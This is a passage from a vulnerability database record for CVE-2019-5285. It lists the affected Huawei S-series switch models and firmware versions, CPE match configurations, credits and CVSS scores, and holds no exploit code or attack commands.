            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s1700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s9300x",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s7900",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c10",
         },
         {
            model: "s9300x",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r010c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s1700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s7900",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r011c10",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r013c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r012c00",
         },
         {
            model: "s12700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s600-e",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r010c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700 v200r009c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700 v200r010c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r012c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r013c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r011c10",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700 v200r011c10",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700 v200r012c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            db: "NVD",
            id: "CVE-2019-5285",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s1700_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s1700_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s1700_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s1700_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s1700_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s1700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s1700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s600-e_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s600-e_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s600-e_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s600-e_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s600-e_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s600-e:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7900_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7900_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7900_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7900:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r008c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300x_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300x_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300x_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300x_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300x:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r010c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r012c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r013c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r011c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2019-5285",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "This vulnerability is by Chi Anxin  Codesafe Team of Legendsec of eack Report to Huawei PSIRT .",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
      trust: 0.6,
   },
   cve: "CVE-2019-5285",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2019-5285",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2019-25515",
                  impactScore: 6.9,
